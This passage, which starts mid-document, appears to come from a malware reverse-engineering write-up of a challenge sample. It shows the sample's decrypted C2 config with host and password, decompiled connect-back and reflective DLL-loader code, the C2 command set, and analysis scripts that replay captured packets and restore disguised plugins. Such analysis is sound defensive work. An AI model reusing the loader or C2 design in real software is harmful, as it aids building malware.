0FAh, 0E9h, 15h, 96h, 38h, 52h, 0B3h, 71h, 0C9h, 7Ah, 0EBh, 0FDh, 0C2h, 0F2h, 94h, 0Ah, 0C8h, 9Fh, 95h, 2Fh, 22h, 77h, 9Dh, 0B0h, 12h, 85h, 14h, 0A5h, 66h, 33h, 51h, 59h
</code></pre></div></div>
<p>After decryption we obtain the following fields, which can also be used to define a Local Type for the struct:</p>
<table>
<thead>
<tr>
<th>Config</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>0x20170417</td>
</tr>
<tr>
<td>listen port</td>
<td> </td>
</tr>
<tr>
<td>port</td>
<td>0x24e3</td>
</tr>
<tr>
<td>host</td>
<td>probably.suspicious.to</td>
</tr>
<tr>
<td>password</td>
<td>welcomepass1!1</td>
</tr>
<tr>
<td>group</td>
<td>feye2017 cli</td>
</tr>
<tr>
<td>mutext</td>
<td>asdliugasldmgj</td>
</tr>
</tbody>
</table>
<h3 id="透過-socket-溝通">Communicating over sockets</h3>
<p>The socket code has two modes: a passive connection (<code class="highlighter-rouge">0x4039A0</code>), where the client listens for the server, and an active connection (<code class="highlighter-rouge">0x4038B0</code>), where it connects back. The active mode is used when the compromised host has no public IP or reaches the Internet through NAT.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if ( functions.CreateMutexW(NULL, 1, cofig.mutext) &amp;&amp; GetLastError() != ERROR_ALREADY_EXISTS )
{
    while ( 1 )
    {
        if ( cofig.listen_port )
        {
            bzero(&amp;_client, 2896u);
            Client::Client(&amp;_client, &amp;functions, &amp;cofig);
            Client::InitPlugins(&amp;_client);
            Client::WaitServer(&amp;_client);
            Client::~Client(&amp;_client);
        }
        else
        {
            bzero(&amp;client, 2896u);
            Client::Client(&amp;client, &amp;functions, &amp;cofig);
            Client::InitPlugins(&amp;client);
            Client::ConnectBack(&amp;client);
            Client::~Client(&amp;client);
        }
        functions.Sleep(10000);
    }
}
</code></pre></div></div>
<p>So far we know that <code class="highlighter-rouge">secondstage.exe</code> downloads modules (plugins) from the C2 server over a socket, loads their functionality and decrypts the packets. For dynamic analysis we again modify <code class="highlighter-rouge">hosts</code> (pointing <code class="highlighter-rouge">probably.suspicious.to</code> to <code class="highlighter-rouge">127.0.0.1</code>) and export the captured packets. In the past, when analysing a malware's packet structure, I extracted the data from Wireshark in <code class="highlighter-rouge">Raw</code> format and analysed it afterwards, but that approach loses track of whether a packet came from the <code class="highlighter-rouge">server</code> or the <code class="highlighter-rouge">client</code> during later processing. This time I export <code class="highlighter-rouge">json</code> from Wireshark instead (File -> Export Packet Dissections -> As JSON), so that <code class="highlighter-rouge">ip.src</code> tells us where each packet came from and <code class="highlighter-rouge">data</code> can be used to rebuild the stream.</p>
<p>Next, we write a Python socket server that replays the packets to <code class="highlighter-rouge">secondstage.exe</code> so that it decrypts them for us. A first attempt at decoding the packet structure shows that, apart from the first few packets, most of the content is encrypted or compressed. The <code class="highlighter-rouge">PythonSocket.py</code> script that feeds the packets to the client:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
import sys
import json

SERVER_IP = '52.0.104.200'    # C2 side of the capture (probably.suspicious.to)
CLIENT_IP = '192.168.221.91'  # infected host in the capture


def read_packet():
    # packet.json is the Wireshark export (File -&gt; Export Packet Dissections -&gt; As JSON)
    with open('packet.json') as f:
        packets = json.load(f)
    print(len(packets))
    return packets


def packet(conn):
    packets = read_packet()
    for i, j in enumerate(packets):
        ip_src = j['_source']['layers']['ip']['ip.src']  # dict
        if ip_src == SERVER_IP:  # only server data
            try:
                data = j['_source']['layers']['data']['data.data']  # get data
            except KeyError:  # packet without a 'data' layer (e.g. a bare ACK)
                continue
            data = data.replace(":", "")
            # pprint(data)
            conn.send(bytes.fromhex(data))
            # check next packet for client: if the client answered, read its reply
            if i + 1 &lt; len(packets) and packets[i + 1]['_source']['layers']['ip']['ip.src'] == CLIENT_IP:
                recv_data = conn.recv(1024)
                print('got data from client')
        else:
            print("----- next packet -----")
    return 0


# Socket
HOST = '0.0.0.0'  # bind
PORT = 9443       # the config port, 0x24e3
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Socket created')
# Bind socket to local host and port
try:
    s.bind((HOST, PORT))
except socket.error as msg:
    print('Bind failed. Error Code : ' + str(msg.errno) + ' Message ' + str(msg.strerror))
    sys.exit()
print('Socket bind complete')
# Start listening on socket
s.listen(10)
print('Server start at: %s:%s' % (HOST, PORT))
print('Wait for connection...')
# connect and send data
while True:
    conn, addr = s.accept()
    print('Connected by ', addr)
    while 1:
        # send
        g_data = packet(conn)
        # conn.send(bytes.fromhex("32303137aff18141240000005e0000005e00000051298f741667d7ed2941950106f505451c0000004200000042000000f37126ad88a5617eaf06000d424c5a21170417200e000000000000000000000000000000155bbf4a1efe1517734604b9d42b80e8770065006c0063006f006d00650070006100730073003100210031000000"))
</code></pre></div></div>
<h2 id="第三階段-利用預設指令集下載安裝-plugins--processor-default">Stage three: downloading/installing plugins with the default command set (Processor default)</h2>
<blockquote>
<p>processor ID = 155bbf4a1efe1517734604b9d42b80e8</p>
</blockquote>
<p>An ID, <code class="highlighter-rouge">155bbf4a1efe1517734604b9d42b80e8</code>, appears in the first few unencrypted packets. Here it is defined as the default Processor, because it identifies the command set of the client (<code class="highlighter-rouge">secondstage.exe</code>); the handler for each command is in the <code class="highlighter-rouge">sub_404D60</code> function of <code class="highlighter-rouge">secondstage.exe</code>.</p>
<h3 id="指令集">Command set</h3>
<table>
<thead>
<tr>
<th>command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x2</td>
<td>Ping</td>
</tr>
<tr>
<td>0x3</td>
<td>GetComputerInfo</td>
</tr>
<tr>
<td>0x4</td>
<td>ListPlugins</td>
</tr>
<tr>
<td>0x5</td>
<td>StartDownloadPlugin</td>
</tr>
<tr>
<td>0x6</td>
<td>DownloadPlugin</td>
</tr>
<tr>
<td>0x7</td>
<td>InstallPlugin: locates the plugin object through the <code class="highlighter-rouge">CreatePluginObj</code> export and manages it according to its plugin type (<code class="highlighter-rouge">CRPT</code>, <code class="highlighter-rouge">COMP</code>, <code class="highlighter-rouge">CMD</code>)</td>
</tr>
<tr>
<td>0x8</td>
<td>Exit</td>
</tr>
<tr>
<td>0x9</td>
<td>Unused</td>
</tr>
<tr>
<td>0xa</td>
<td>Unused</td>
</tr>
<tr>
<td>0xb</td>
<td>MessageBox</td>
</tr>
<tr>
<td>0xd</td>
<td>ClearDownloadTask</td>
</tr>
<tr>
<td>0xe</td>
<td>Online: connect to the C2 relay, using the password stored in the config</td>
</tr>
</tbody>
</table>
<h3 id="受害電腦的資訊">Victim machine information</h3>
<p>Information about the victim machine is retrieved with <code class="highlighter-rouge">cmd = 0x3</code>; the packet layout is as follows:</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Content</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x10</td>
<td>0x40</td>
<td>version</td>
</tr>
<tr>
<td>0x50</td>
<td>0x80</td>
<td>computer name</td>
</tr>
<tr>
<td>0xd0</td>
<td>0x80</td>
<td>user name</td>
</tr>
<tr>
<td>0x150</td>
<td>0x200</td>
<td>group name</td>
</tr>
<tr>
<td>0x350</td>
<td>0x1c</td>
<td>others info</td>
</tr>
</tbody>
</table>
<p>Victim machine information recovered from the packets:</p>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<h3 id="plugins-資訊">Plugin information</h3>
<p>Plugins are downloaded with <code class="highlighter-rouge">cmd = 0x6</code>. Each download carries a header of size <code class="highlighter-rouge">0x20</code> that describes the transfer: the ID and type of the plugin being downloaded, and how far the download has progressed.</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x64</td>
<td>16 bytes</td>
<td>Downloading Plugin’s GUID</td>
<td>c30b1a2dcb489ca8a724376469cf6782 -> rc4</td>
</tr>
<tr>
<td>0x74</td>
<td>4 bytes</td>
<td>type</td>
<td>43525054 -> CRPT</td>
</tr>
<tr>
<td>0x78</td>
<td>4 bytes</td>
<td>offset</td>
<td>002e0100</td>
</tr>
<tr>
<td>0x7c</td>
<td>4 bytes</td>
<td>total size</td>
<td>002e0100</td>
</tr>
<tr>
<td>0x80</td>
<td>4 bytes</td>
<td>chunksize</td>
<td>00400000</td>
</tr>
</tbody>
</table>
<p>There are three plugin types:</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Contents</th>
<th>Hex</th>
</tr>
</thead>
<tbody>
<tr>
<td>CRPT</td>
<td>Crypto</td>
<td>43525054</td>
</tr>
<tr>
<td>COMP</td>
<td>Compress</td>
<td>434f4d50</td>
</tr>
<tr>
<td>CMD</td>
<td>C2</td>
<td>434d44</td>
</tr>
</tbody>
</table>
<h3 id="還原-plugins">Restoring the plugins</h3>
<p>Plugins are installed with <code class="highlighter-rouge">cmd = 0x7</code>; by understanding how the program installs them, we can restore the plugins</p>
<h4 id="安裝步驟">Installation steps</h4>
<ul>
<li><code class="highlighter-rouge">0x4053A0</code> implements <code class="highlighter-rouge">LoadLibrary</code> and validates the PE format</li>
<li>Checks that the data begins with <code class="highlighter-rouge">LM</code></li>
<li>Offset <code class="highlighter-rouge">0x3c</code> is normally used to locate the <code class="highlighter-rouge">PE</code> signature; here the malware uses it to look for <code class="highlighter-rouge">NOP</code></li>
<li>Checks that the <code class="highlighter-rouge">FileHeader.Machine</code> type is <code class="highlighter-rouge">0x3233</code></li>
<li>Implements <code class="highlighter-rouge">LoadLibrary</code>
<ul>
<li>Allocates a block of <code class="highlighter-rouge">OptionalHeader.SizeOfImage</code> bytes with <code class="highlighter-rouge">VirtualAlloc</code></li>
<li>Copies each PE section to its <code class="highlighter-rouge">VirtualAddress</code></li>
<li>Applies the <code class="highlighter-rouge">.reloc</code> section (base relocations)</li>
<li>Processes the import table: loads each DLL and resolves the imported functions</li>
</ul>
</li>
<li>XORs <code class="highlighter-rouge">OptionalHeader.AddressOfEntryPoint</code> with <code class="highlighter-rouge">0xABCDABCD</code> to obtain the DLL's entry point</li>
</ul>
<h4 id="安裝-plugin-的程式碼">Plugin installation code</h4>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(</span> <span class="n">image</span><span class="o">-></span><span class="n">e_magic</span> <span class="o">!=</span> <span class="err">'</span><span class="n">ML</span><span class="err">'</span> <span class="p">)</span> <span class="c1">// MZ
</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">PE</span> <span class="o">=</span> <span class="p">(</span><span class="n">image</span> <span class="o">+</span> <span class="n">image</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">Signature</span> <span class="o">!=</span> <span class="err">'</span><span class="n">PON</span><span class="err">'</span> <span class="p">)</span> <span class="c1">// PE
</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">Machine</span> <span class="o">!=</span> <span class="mh">0x3233</span> <span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">base</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfImage</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">base</span> <span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">section</span> <span class="o">=</span> <span class="p">(</span><span class="o">&</span><span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">SizeOfOptionalHeader</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">memcpy</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="n">image</span><span class="p">,</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfHeaders</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PE</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">memcpy</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">section</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">,</span> <span class="n">image</span> <span class="o">+</span> <span class="n">section</span><span class="o">-></span><span class="n">PointerToRawData</span><span class="p">,</span> <span class="n">section</span><span class="o">-></span><span class="n">SizeOfRawData</span><span class="p">);</span>
<span class="o">++</span><span class="n">section</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">VirtualAddress</span>
<span class="o">&&</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">Size</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">offset</span> <span class="o">=</span> <span class="n">base</span> <span class="o">-</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">ImageBase</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">rel</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_BASERELOC</span><span class="p">].</span><span class="n">VirtualAddress</span><span class="p">);</span>
<span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span><span class="p">;</span>
<span class="n">rel</span> <span class="o">=</span> <span class="p">(</span><span class="n">rel</span> <span class="o">+</span> <span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span><span class="p">)</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">rel</span><span class="o">-></span><span class="n">SizeOfBlock</span> <span class="o">-</span> <span class="mi">8</span><span class="p">)</span> <span class="o">>></span> <span class="mi">1</span><span class="p">;</span>
<span class="n">v12</span> <span class="o">=</span> <span class="n">rel</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">size</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v6</span> <span class="o">=</span> <span class="n">LOWORD</span><span class="p">(</span><span class="n">v12</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">)</span> <span class="o">>></span> <span class="mi">12</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v6</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v6</span> <span class="o">!=</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">rel</span><span class="o">-></span><span class="n">VirtualAddress</span> <span class="o">+</span> <span class="p">(</span><span class="n">v12</span><span class="o">-></span><span class="n">VirtualAddress</span> <span class="o">&</span> <span class="mh">0xFFF</span><span class="p">))</span> <span class="o">+=</span> <span class="n">offset</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">v12</span> <span class="o">=</span> <span class="p">(</span><span class="n">v12</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">VirtualAddress</span>
<span class="o">&&</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">Size</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">entry</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">IMAGE_DIRECTORY_ENTRY_IMPORT</span><span class="p">].</span><span class="n">VirtualAddress</span><span class="p">);</span>
<span class="n">entry</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">;</span>
<span class="o">++</span><span class="n">entry</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">hModule</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">Name</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">hModule</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">thunk</span> <span class="o">=</span> <span class="p">(</span><span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span>
<span class="n">v1</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">entry</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span> <span class="o">*</span><span class="n">v1</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">import</span> <span class="o">=</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">v1</span> <span class="o">>=</span> <span class="mi">0</span> <span class="p">)</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="o">&</span><span class="n">import</span><span class="o">-></span><span class="n">Name</span> <span class="o">+</span> <span class="n">base</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">functions</span><span class="p">.</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">import</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!*&</span><span class="n">addr</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">*</span><span class="n">thunk</span> <span class="o">=</span> <span class="n">addr</span><span class="p">;</span>
<span class="n">v1</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span>
<span class="o">++</span><span class="n">thunk</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">((</span><span class="n">base</span> <span class="o">+</span> <span class="p">(</span><span class="n">PE</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">AddressOfEntryPoint</span> <span class="o">^</span> <span class="mh">0xABCDABCD</span><span class="p">)))(</span><span class="n">base</span><span class="p">,</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span><span class="c1">// DLLMain
</span> <span class="k">return</span> <span class="n">base</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<h4 id="還原-plugin">Restoring a plugin</h4>
<ul>
<li>Replace the first two bytes <code class="highlighter-rouge">LM</code> with <code class="highlighter-rouge">MZ</code> (the MZ header)</li>
<li><code class="highlighter-rouge">e_lfanew</code>, stored at offset <code class="highlighter-rouge">0x3C</code> of the file, is the offset of the PE header; follow it to the PE header inside the file and replace <code class="highlighter-rouge">NOP\0</code> with <code class="highlighter-rouge">PE\0\0</code></li>
<li>Replace <code class="highlighter-rouge">FileHeader.Machine</code> with <code class="highlighter-rouge">IMAGE_FILE_MACHINE_I386</code> (0x014c)</li>
<li>XOR <code class="highlighter-rouge">OptionalHeader.AddressOfEntryPoint</code> with <code class="highlighter-rouge">0xABCDABCD</code> to obtain the DLL's entry point</li>
</ul>
<h4 id="還原-plugin-的程式碼">Plugin restoration code</h4>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#===========================================</span>
<span class="c"># Usage: python pe.py [InputPE] [OutputPE]</span>
<span class="c">#===========================================</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c"># python pe.py pe pedump</span>
<span class="k">def</span> <span class="nf">ReadFile</span><span class="p">():</span>
<span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'rb'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="s">""</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">ifile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s">'rb'</span><span class="p">)</span>
<span class="n">ofile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="s">'wb'</span><span class="p">)</span>
<span class="c"># MZ header</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">==</span> <span class="s">'LM'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'MZ'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'MZ header done'</span>
<span class="c"># Write up to e_lfanew</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mh">0x3c</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span>
<span class="n">e_lfanew</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">e_lfanew</span><span class="p">))</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">e_lfanew</span> <span class="o">-</span> <span class="p">(</span><span class="mh">0x3c</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)))</span>
<span class="c"># PE header</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="o">==</span> <span class="s">'NOP</span><span class="se">\0</span><span class="s">'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'PE</span><span class="se">\0\0</span><span class="s">'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'PE header done'</span>
<span class="c"># Machine</span>
<span class="k">assert</span> <span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="o">==</span> <span class="s">'32'</span> <span class="c">#FileHeader.Machine</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s">'</span><span class="se">\x4c\x01</span><span class="s">'</span><span class="p">)</span> <span class="c">##IMAGE_FILE_MACHINE_I386</span>
<span class="k">print</span> <span class="s">'PE.Machine done'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mh">0x22</span><span class="p">))</span>
<span class="c"># Make Entrypoint</span>
<span class="n">entrypoint</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span> <span class="o">^</span> <span class="mh">0xabcdabcd</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">entrypoint</span><span class="p">))</span>
<span class="k">print</span> <span class="s">'Entrypoint done'</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">ifile</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">ifile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="n">ofile</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">print</span> <span class="s">'DLL Done'</span>
</code></pre></div></div>
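<p>A Python 3 counterpart of the script above, added here as an example (it is not the author's script): it applies the same four fixes in memory, but bounds-checks <code class="highlighter-rouge">e_lfanew</code> before patching so a corrupt offset cannot push the writes past the buffer. <code class="highlighter-rouge">mangle_for_test</code> builds a constructed minimal header in the mangled form for testing; it is not a real plugin.</p>

```python
import struct

ENTRY_XOR = 0xABCDABCD            # the loader XORs AddressOfEntryPoint with this constant
IMAGE_FILE_MACHINE_I386 = 0x014C  # replaces the mangled Machine value 0x3233 ("32")


def restore_plugin(blob: bytes) -> bytes:
    """Undo the four header tweaks the loader expects and return a normal PE image."""
    if len(blob) < 0x40 or blob[:2] != b"LM":
        raise ValueError("not a mangled plugin: missing 'LM' magic")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    # Bound e_lfanew so a corrupt value cannot make us read or patch past the buffer
    # (the entry point sits at e_lfanew + 0x28: PE sig 4 + FileHeader 20 + 16 bytes).
    if e_lfanew + 0x2C > len(blob):
        raise ValueError(f"e_lfanew {e_lfanew:#x} points past end of file")
    if blob[e_lfanew:e_lfanew + 4] != b"NOP\0":
        raise ValueError("missing 'NOP' signature at e_lfanew")
    if blob[e_lfanew + 4:e_lfanew + 6] != b"32":      # FileHeader.Machine == 0x3233
        raise ValueError("unexpected FileHeader.Machine")
    out = bytearray(blob)
    out[0:2] = b"MZ"
    out[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", out, e_lfanew + 4, IMAGE_FILE_MACHINE_I386)
    ep_off = e_lfanew + 0x28
    entry = struct.unpack_from("<I", out, ep_off)[0] ^ ENTRY_XOR
    struct.pack_into("<I", out, ep_off, entry)
    return bytes(out)


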